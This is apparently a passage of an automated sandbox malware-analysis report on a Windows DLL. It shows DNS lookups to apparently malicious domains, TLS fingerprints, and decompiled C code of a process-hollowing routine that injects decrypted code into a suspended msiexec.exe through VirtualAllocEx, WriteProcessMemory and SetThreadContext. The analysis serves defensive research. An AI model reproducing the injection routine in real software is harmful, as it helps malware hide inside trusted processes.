Dec 13, 2020 18:00:47.556493998 CET	192.168.2.3	8.8.8.8	0xde36	Standard query (0)	www.rcclabbd.com	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:01.057795048 CET	192.168.2.3	8.8.8.8	0x94b9	Standard query (0)	thecype.com	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:01.960922956 CET	192.168.2.3	8.8.8.8	0xb3a0	Standard query (0)	theterteboltallbrow.tk	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:02.058600903 CET	192.168.2.3	8.8.8.8	0x7241	Standard query (0)	theterteboltallbrow.tk	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:07.111082077 CET	192.168.2.3	8.8.8.8	0xe276	Standard query (0)	theterteboltallbrow.tk	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:07.160408020 CET	192.168.2.3	8.8.8.8	0xb92f	Standard query (0)	theterteboltallbrow.tk	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:12.204451084 CET	192.168.2.3	8.8.8.8	0xeb0	Standard query (0)	theterteboltallbrow.tk	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:12.304409027 CET	192.168.2.3	8.8.8.8	0x79f4	Standard query (0)	theterteboltallbrow.tk	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 13, 2020 18:00:44.293592930 CET	8.8.8.8	192.168.2.3	0xca7c	No error (0)	www.businessinsurancelaw.com	businessinsurancelaw.com		CNAME (Canonical name)	IN (0x0001)
Dec 13, 2020 18:00:44.293592930 CET	8.8.8.8	192.168.2.3	0xca7c	No error (0)	businessinsurancelaw.com		70.32.23.56	A (IP address)	IN (0x0001)
Dec 13, 2020 18:00:45.616791964 CET	8.8.8.8	192.168.2.3	0xd7d3	No error (0)	squire.ae		70.32.23.56	A (IP address)	IN (0x0001)
Dec 13, 2020 18:00:46.587399006 CET	8.8.8.8	192.168.2.3	0xa2f1	No error (0)	lamun.pk		67.23.227.19	A (IP address)	IN (0x0001)
Dec 13, 2020 18:00:47.724914074 CET	8.8.8.8	192.168.2.3	0xde36	No error (0)	www.rcclabbd.com	rcclabbd.com		CNAME (Canonical name)	IN (0x0001)
Dec 13, 2020 18:00:47.724914074 CET	8.8.8.8	192.168.2.3	0xde36	No error (0)	rcclabbd.com		192.254.225.195	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:01.100646019 CET	8.8.8.8	192.168.2.3	0x94b9	No error (0)	thecype.com		192.3.183.226	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:02.051309109 CET	8.8.8.8	192.168.2.3	0xb3a0	Name error (3)	theterteboltallbrow.tk	none	none	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:02.094324112 CET	8.8.8.8	192.168.2.3	0x7241	Name error (3)	theterteboltallbrow.tk	none	none	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:07.152836084 CET	8.8.8.8	192.168.2.3	0xe276	Name error (3)	theterteboltallbrow.tk	none	none	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:07.193361044 CET	8.8.8.8	192.168.2.3	0xb92f	Name error (3)	theterteboltallbrow.tk	none	none	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:12.287242889 CET	8.8.8.8	192.168.2.3	0xeb0	Name error (3)	theterteboltallbrow.tk	none	none	A (IP address)	IN (0x0001)
Dec 13, 2020 18:01:12.339963913 CET	8.8.8.8	192.168.2.3	0x79f4	Name error (3)	theterteboltallbrow.tk	none	none	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Dec 13, 2020 18:00:44.623739958 CET	70.32.23.56	443	192.168.2.3	49735	CN=businessinsurancelaw.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Sep 29 02:00:00 CEST 2020 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Tue Dec 29 00:59:59 CET 2020 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029
Dec 13, 2020 18:00:45.876168966 CET	70.32.23.56	443	192.168.2.3	49736	CN=squire.ae CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Oct 29 01:00:00 CET 2020 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Thu Jan 28 00:59:59 CET 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029
Dec 13, 2020 18:00:46.854670048 CET	67.23.227.19	443	192.168.2.3	49737	CN=*.lamun.pk CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Oct 27 22:33:43 CET 2020 Thu Mar 17 17:40:46 CET 2016	Mon Jan 25 22:33:43 CET 2021 Wed Mar 17 17:40:46 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Dec 13, 2020 18:00:46.854670048 CET	67.23.227.19	443	192.168.2.3	49737	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Mar 17 17:40:46 CET 2016	Wed Mar 17 17:40:46 CET 2021		37f463bf4616ecd445d4a1937da06e19
Dec 13, 2020 18:00:48.050462008 CET	192.254.225.195	443	192.168.2.3	49738	CN=cpanel.rcclabbd.com CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Fri Nov 13 11:07:04 CET 2020 Thu Mar 17 17:40:46 CET 2016	Thu Feb 11 11:07:04 CET 2021 Wed Mar 17 17:40:46 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Dec 13, 2020 18:00:48.050462008 CET	192.254.225.195	443	192.168.2.3	49738	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Mar 17 17:40:46 CET 2016	Wed Mar 17 17:40:46 CET 2021		37f463bf4616ecd445d4a1937da06e19
Dec 13, 2020 18:01:01.329282999 CET	192.3.183.226	443	192.168.2.3	49747	CN=webmail.thecype.com CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sat Oct 17 20:11:48 CEST 2020 Thu Mar 17 17:40:46 CET 2016	Fri Jan 15 19:11:48 CET 2021 Wed Mar 17 17:40:46 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Dec 13, 2020 18:01:01.329282999 CET	192.3.183.226	443	192.168.2.3	49747	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Mar 17 17:40:46 CET 2016	Wed Mar 17 17:40:46 CET 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5312 Parent PID: 5628

General

Start time:	17:59:56
Start date:	13/12/2020
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\v1Us5AICBm.dll'
Imagebase:	0x13d0000
File size:	120832 bytes
MD5 hash:	2D39D4DFDE8F7151723794029AB8A034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msiexec.exe PID: 6160 Parent PID: 5312

General

Start time:	18:00:40
Start date:	13/12/2020
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe
Imagebase:	0x1140000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5312 Parent PID: 5628 loaddll32.exeCOMMON

Executed Functions

Function 1000AE40, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 372
threadinjectionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000AE40(void* __eflags) {
				void* _v20;
				void* _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				struct _PROCESS_INFORMATION _v68;
				void* _v72;
				intOrPtr _v110;
				char _v111;
				char _v125;
				signed int _v129;
				char _v130;
				void* _v134;
				char _v135;
				intOrPtr _v139;
				void _v140;
				char _v155;
				char _v179;
				void* _v712;
				char _v896;
				char _v1416;
				void* __ebx;
				void* __edi;
				void* _t76;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t94;
				int _t97;
				void* _t100;
				void* _t104;
				signed int _t107;
				int _t109;
				void* _t111;
				void _t112;
				void* _t119;
				int _t121;
				void* _t124;
				int _t126;
				long _t128;
				int _t129;
				int _t136;
				void* _t137;
				signed int _t139;
				signed int _t148;
				void* _t150;
				struct _STARTUPINFOA* _t151;
				long _t152;
				void* _t153;
				CONTEXT* _t155;
				signed int _t157;
				void* _t159;
				signed int _t172;
				void* _t177;
				CHAR* _t178;
				long _t180;
				intOrPtr _t182;
				void* _t184;
				signed int _t185;
				void* _t196;
				void* _t207;
				signed int _t241;

				_t226 = __eflags;
				E100045B0(_t76, _t159, _t177, __eflags); // executed
				E10006C20(_t159, _t177, __eflags); // executed
				E10006530(_t159, _t177, _t226); // executed
				E10008660(_t159, _t177, _t226); // executed
				E100078D0(_t159, _t177, _t226); // executed
				E100066E0(_t159, _t177, _t226); // executed
				_t188 = 0xffffffff;
				if(E1000D670() == 0) {
					return 0xffffffff;
				}
				E1001B180();
				_t228 =  *0x100237b0;
				if( *0x100237b0 == 0) {
					L19:
					E1000BF50(_t243, 0, E10009D50(0x638d6cbf));
					ExitProcess(0);
				}
				_t89 = E1000BF50(_t228, 0, E10009D50(0x6bae8bdb));
				_t196 = _t196 + 0xc;
				_t188 =  &_v1416;
				 *_t89( *0x100237b0,  &_v1416, 0x104);
				_t91 =  *0x100237b0; // 0x10000000
				_t229 = _t91;
				_v32 = _t91;
				if(_t91 == 0) {
					goto L19;
				}
				_t151 =  &_v140;
				E10018F20(_t151, 0x44);
				_v140 = 0x44;
				_t94 = E1000D0A0( &_v179, 0x10020b1b,  &_v179);
				_t178 =  &_v896;
				E1000C560(_t178, _t94, 0xffffffff);
				E1000BF50(_t229, 0, 0x1e16041);
				_t196 = _t196 + 0x24;
				_t97 = CreateProcessA(0, _t178, 0, 0, 0, 4, 0, 0, _t151,  &_v68); // executed
				_t230 = _t97 - 1;
				if(_t97 != 1) {
					goto L19;
				}
				_t152 = E1000A820(_v32);
				E1000BF50(_t230, 0, 0x8cae838);
				_t196 = _t196 + 0xc;
				_t100 = VirtualAllocEx(_v68.hProcess, 0, _t152, 0x3000, 4); // executed
				_t231 = _t100;
				if(_t100 == 0) {
					goto L19;
				}
				 *0x10022ca8 = _t100;
				_v24 = _t100;
				E1001FA60(_t178, _t231,  &_v1416);
				E100190E0(_t178);
				E1001FB20(_t178);
				_t104 = E10009D80(_v32, _t152); // executed
				_t188 = _t104;
				E10014660(_t104, _v32);
				E10009550(_t152, _t177, _v32, _t231, _t188, _v24);
				_t207 = _t196 + 0x1c;
				_t107 = E100176C0(_t231);
				_t180 = _t152;
				_v48 = _t107;
				if(_t152 == 0) {
					L8:
					_v28 = 0;
					E1000BF50(_t234, 0, 0xa48b0f9);
					_t196 = _t207 + 8;
					_t109 = WriteProcessMemory(_v68.hProcess, _v24, _t188, _t180,  &_v28); // executed
					_t235 = _t109 - 1;
					if(_t109 == 1) {
						_t188 = _t180;
						E1000BF50(_t235, 0, 0x8cae838);
						_t196 = _t196 + 8;
						_t111 = VirtualAllocEx(_v68.hProcess, 0, 0x42, 0x3000, 4); // executed
						_t236 = _t111;
						if(_t111 != 0) {
							_t112 = E10007DD0(0x12);
							_t153 = _v24;
							_v140 = _t112;
							_v20 = _t111;
							_v139 = _t153;
							_v135 = E10007DD0(0x15);
							_v134 = _t188;
							_v130 = 0xb8;
							_v129 = _v48;
							E1000E930( &_v125, E1001D7E0( &_v28, _t177, 0x10020962, 0xf,  &_v155), 0xe);
							_t182 = _v32;
							_v111 = 0xe9;
							E100022E0(_t236, E1000CA4E, _t182);
							_t119 = E10009D50(0x2e6222c1);
							_t184 = _v20;
							_v110 = 0xc5eaa7e1 - _t182 + _t153 - _t184 + _t119;
							E1000BF50(_t236, 0, 0xa48b0f9);
							_t196 = _t196 + 0x34;
							_t121 = WriteProcessMemory(_v68.hProcess, _t184,  &_v140, 0x42,  &_v28); // executed
							_t237 = _t121 - 1;
							if(_t121 == 1) {
								_v36 = _t188;
								_t155 =  &_v896;
								E10018F20(_t155, 0x2cc);
								_v896 = 0x10001;
								E1000BF50(_t237, 0, 0x4bbc7e4);
								_t124 = GetThreadContext(_v68.hThread, _t155); // executed
								_t188 = _t124;
								E1000BF50(_t237, 0, 0xd1a4de8);
								_t196 = _t196 + 0x18;
								_t126 = VirtualProtectEx(_v68.hProcess, _t184, 0x42, 0x10,  &_v28); // executed
								if(_t126 == 1) {
									_t239 = _t188 - 1;
									_t172 = 1;
									_v712 = _t184;
									if(_t188 == 1) {
										E1000BF50(_t239, 0, E10009D50(0x60ce8748));
										_t196 = _t196 + 0xc;
										_t136 = SetThreadContext(_v68.hThread, _t155); // executed
										_t68 = _t136 != 1;
										_t241 = _t68;
										_t172 = 0 | _t68;
									}
									_t185 = _t172;
									_t188 = E1000BF50(_t241, 0, 0xd1a4de8);
									_t128 = E10009D50(0x647400ec);
									_t196 = _t196 + 0xc;
									_t129 = VirtualProtectEx(_v68.hProcess, _v24, _v36, _t128,  &_v28); // executed
									if(_t129 == 1) {
										_t243 = _t185;
										if(_t185 == 0) {
											E1000BF50(__eflags, 0, E10009D50(0x6f5727e8));
											_t196 = _t196 + 0xc;
											_push(_v68.hThread);
										} else {
											E1000BF50(_t243, 0, 0x68b1574);
											_t196 = _t196 + 8;
											_push(0);
											_push(0);
											_push(0);
											_push(_v20);
											_push(0);
											_push(0);
											_push(_v68);
										}
										ResumeThread(); // executed
									}
								}
							}
						}
					}
					goto L19;
				} else {
					_t157 = _v48;
					_t137 = 0;
					_v36 = _t180;
					_v72 = _t188;
					do {
						_v20 = _t137;
						 *(_t188 + _t137) =  *(_t188 + _t137) ^ _t157;
						_t139 = _t157 << 8;
						_v52 = _t139;
						_v44 =  !_t139;
						_v40 = E10003750(0,  !_t139, 0x9b6b004f);
						_v40 = E10002DC0(0, E10009D50(0xff1f00e3) &  !(_t157 >> 0x18), _t157 >> 0x00000018 & 0xffffffb0) ^ (_v52 & 0x6494ff00 | _v40);
						_t180 = _v36;
						_v44 = E100020A0(0, E10002DC0(0, _v44,  !(_t157 >> 0x18)), 0xffffffff);
						_t148 = E10009D50(0xff1f00e3);
						E10002DC0(0, _v52, _t157 >> 0x18);
						_t150 = E100022E0(0, 0, 1);
						_t207 = _t207 + 0x38;
						_v20 = _v20 - _t150;
						_t157 = (_t148 | 0x6494ffb0) & _v44 | _v40;
						_t188 = _v72;
						_t137 = _v20;
						_t234 = _t137 - _t180;
					} while (_t137 != _t180);
					goto L8;
				}
			}

0x1000ae40
0x1000ae4c
0x1000ae51
0x1000ae56
0x1000ae5b
0x1000ae60
0x1000ae65
0x1000ae6a
0x1000ae76
0x1000b2de
0x1000b2de
0x1000ae7c
0x1000ae81
0x1000ae88
0x1000b2b4
0x1000b2c4
0x1000b2ce
0x1000b2ce
0x1000ae9e
0x1000aea3
0x1000aea6
0x1000aeb8
0x1000aeba
0x1000aebf
0x1000aec1
0x1000aec4
0x00000000
0x00000000
0x1000aeca
0x1000aed3
0x1000aee1
0x1000aef1
0x1000aef9
0x1000af03
0x1000af12
0x1000af17
0x1000af2e
0x1000af30
0x1000af33
0x00000000
0x00000000
0x1000af44
0x1000af4d
0x1000af52
0x1000af62
0x1000af64
0x1000af66
0x00000000
0x00000000
0x1000af6c
0x1000af74
0x1000af77
0x1000af7d
0x1000af87
0x1000af91
0x1000af99
0x1000af9d
0x1000afa9
0x1000afae
0x1000afb1
0x1000afb8
0x1000afba
0x1000afbd
0x1000b08d
0x1000b08d
0x1000b09b
0x1000b0a0
0x1000b0af
0x1000b0b1
0x1000b0b4
0x1000b0ba
0x1000b0c3
0x1000b0c8
0x1000b0d9
0x1000b0db
0x1000b0dd
0x1000b0e7
0x1000b0ef
0x1000b0f2
0x1000b0f8
0x1000b0fb
0x1000b10b
0x1000b114
0x1000b11a
0x1000b11e
0x1000b13e
0x1000b146
0x1000b149
0x1000b153
0x1000b160
0x1000b176
0x1000b17d
0x1000b187
0x1000b18c
0x1000b19d
0x1000b19f
0x1000b1a2
0x1000b1a8
0x1000b1b0
0x1000b1b7
0x1000b1bf
0x1000b1d0
0x1000b1dc
0x1000b1de
0x1000b1e7
0x1000b1ec
0x1000b1fb
0x1000b200
0x1000b206
0x1000b209
0x1000b20e
0x1000b214
0x1000b226
0x1000b22b
0x1000b232
0x1000b239
0x1000b239
0x1000b239
0x1000b239
0x1000b23c
0x1000b250
0x1000b257
0x1000b25c
0x1000b26b
0x1000b270
0x1000b272
0x1000b274
0x1000b2a7
0x1000b2ac
0x1000b2af
0x1000b276
0x1000b27d
0x1000b282
0x1000b285
0x1000b287
0x1000b289
0x1000b28b
0x1000b28e
0x1000b290
0x1000b292
0x1000b292
0x1000b2b2
0x1000b2b2
0x1000b270
0x1000b200
0x1000b1a2
0x1000b0dd
0x00000000
0x1000afc3
0x1000afc3
0x1000afc6
0x1000afc8
0x1000afcb
0x1000afd0
0x1000afd0
0x1000afd3
0x1000afdd
0x1000afe0
0x1000afe7
0x1000affb
0x1000b027
0x1000b02b
0x1000b044
0x1000b04c
0x1000b066
0x1000b072
0x1000b077
0x1000b07a
0x1000b07d
0x1000b07f
0x1000b082
0x1000b085
0x1000b085
0x00000000
0x1000afd0

APIs

VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000004), ref: 1000AF62
WriteProcessMemory.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 1000B0AF
VirtualAllocEx.KERNELBASE(?,00000000,00000042,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 1000B0D9
WriteProcessMemory.KERNELBASE(?,?,00000044,00000042,00000000), ref: 1000B19D
GetThreadContext.KERNELBASE(?,?), ref: 1000B1DC
VirtualProtectEx.KERNELBASE(?,?,00000042,00000010,00000000), ref: 1000B1FB
SetThreadContext.KERNELBASE(?,?), ref: 1000B232
VirtualProtectEx.KERNELBASE(?,?,?,00000000,00000000), ref: 1000B26B
ResumeThread.KERNELBASE(?), ref: 1000B2B2
CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 1000AF2E

Part of subcall function 1000BF50: LoadLibraryA.KERNEL32(?), ref: 1000C1A1

ExitProcess.KERNEL32(00000000), ref: 1000B2CE

Strings

D, xrefs: 1000AEE1

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessVirtual$Thread$AllocContextMemoryProtectWrite$CreateExitLibraryLoadResume
String ID: D
API String ID: 1100182367-2746444292
Opcode ID: 3168ef383adb04cd382aa274e18b8a634d0ee40fd11c567e509657a8a91801e1
Instruction ID: 82208aff453b692a18854158aeb7dac59df2dc5fa133dffb4483593db3b176e0
Opcode Fuzzy Hash: 3168ef383adb04cd382aa274e18b8a634d0ee40fd11c567e509657a8a91801e1
Instruction Fuzzy Hash: 96C1F6BAD406196BFB10DBA49C43FAE7674EF54745F150024FA08B72C6EA717E048BB2

Uniqueness

Uniqueness Score: -1.00%

Function 1005C98D, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000670,00003000,00000040,00000670,1005C3E0), ref: 1005CA4A
VirtualAlloc.KERNEL32(00000000,0000055A,00003000,00000040,1005C446), ref: 1005CA81
VirtualAlloc.KERNEL32(00000000,0002147D,00003000,00000040), ref: 1005CAE1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 1005CB17
VirtualProtect.KERNEL32(10000000,00000000,00000004,1005C96C), ref: 1005CC1C
VirtualProtect.KERNEL32(10000000,00001000,00000004,1005C96C), ref: 1005CC43
VirtualProtect.KERNEL32(00000000,?,00000002,1005C96C), ref: 1005CD10
VirtualProtect.KERNEL32(00000000,?,00000002,1005C96C,?), ref: 1005CD66
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 1005CD82

Memory Dump Source

Source File: 00000000.00000002.295167038.000000001005C000.00000040.00020000.sdmp, Offset: 1005C000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 8823dd2155945c38deeeea9426386af03b6c19a49e1c3ecb231216e959264231
Instruction ID: 3a7ddc028b9e5d13f88fc65d05860b13fbc6c2ad8e4784caee3b68a882a6879c
Opcode Fuzzy Hash: 8823dd2155945c38deeeea9426386af03b6c19a49e1c3ecb231216e959264231
Instruction Fuzzy Hash: BDD168726002049FDB15CF54CAA1F527BB6FF88720B994295ED099F26AD7B0F844CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001DA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E10007200(0x100205f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4); // executed
				}
				SetLastError(0);
				return _t4;
			}

0x1001da3f
0x1001da47
0x1001da4c
0x1001da53
0x1001da53
0x1001da5b
0x1001da66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-10021D33,?,100091EB,-10021D33,?,100077A1,00000001), ref: 1001DA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-10021D33,?,100091EB,-10021D33,?,100077A1,00000001,?,-10021D33,?,10006A74), ref: 1001DA4C
CloseHandle.KERNELBASE(00000000,?,?,0CD06773,?,-10021D33,?,100091EB,-10021D33,?,100077A1,00000001,?,-10021D33,?,10006A74), ref: 1001DA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-10021D33,?,100091EB,-10021D33,?,100077A1,00000001,?,-10021D33,?,10006A74), ref: 1001DA5B

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: 0133781c995ba572d096f5a37d229af26a8a6ebc9e7337965035c491e3a90fe7
Instruction ID: ef30fcfcb4f789aa95dc50ca9f439ba7d047270f7c21aa631d77fbb5a98b3e05
Opcode Fuzzy Hash: 0133781c995ba572d096f5a37d229af26a8a6ebc9e7337965035c491e3a90fe7
Instruction Fuzzy Hash: 3BE0DFB1A40320ABF200F7E46C8EFAA3A2DDF00782F500060FB0DD9083E6649441C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 1004F9B0, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 870sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000000A7), ref: 10050406

Strings

m, xrefs: 1004FC7E

Memory Dump Source

Source File: 00000000.00000002.295132154.0000000010026000.00000020.00020000.sdmp, Offset: 10026000, based on PE: false

Similarity

API ID: Sleep
String ID: m
API String ID: 3472027048-3775001192
Opcode ID: b79c0d17c4c4e0d82e1ff6e7cd3769a9f9e53085c62f4c947f5e41bbb6b2073e
Instruction ID: 3904ab6711bd30f31afe954be26a0add6ce179377caf499989884efa7c308faf
Opcode Fuzzy Hash: b79c0d17c4c4e0d82e1ff6e7cd3769a9f9e53085c62f4c947f5e41bbb6b2073e
Instruction Fuzzy Hash: 8C82F975904B668FE714CF39C9D40BABBE0FB88240B14457ED998873A6E734B948CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001D770, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001D770() {
				char _v22;

				GetConsoleCP(); // executed
				GetFileAttributesW(E10007200(0x100205f8,  &_v22));
				return GetCapture();
			}

0x1001d776
0x1001d78e
0x1001d798

APIs

GetConsoleCP.KERNELBASE(?,?,?,?,1000AE51), ref: 1001D776
GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,1000AE51), ref: 1001D78E

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesConsoleFile
String ID:
API String ID: 1533235433-0
Opcode ID: e5fa7c0eab215081f4e062a2498384b4fff56ce901cb8d972cdbb4fbf5a50bbb
Instruction ID: 4864fe370ee70146d9bd1d802b78239d64b71a40445c391bfbdd024e034f22e4
Opcode Fuzzy Hash: e5fa7c0eab215081f4e062a2498384b4fff56ce901cb8d972cdbb4fbf5a50bbb
Instruction Fuzzy Hash: D5D0A7B08002199BF640F7A85C8DA2B372DAA00106F900060FD0941513E52C60598BB6

Uniqueness

Uniqueness Score: -1.00%

Function 1004EF90, Relevance: 1.7, APIs: 1, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(00003196), ref: 1004F103

Memory Dump Source

Source File: 00000000.00000002.295132154.0000000010026000.00000020.00020000.sdmp, Offset: 10026000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
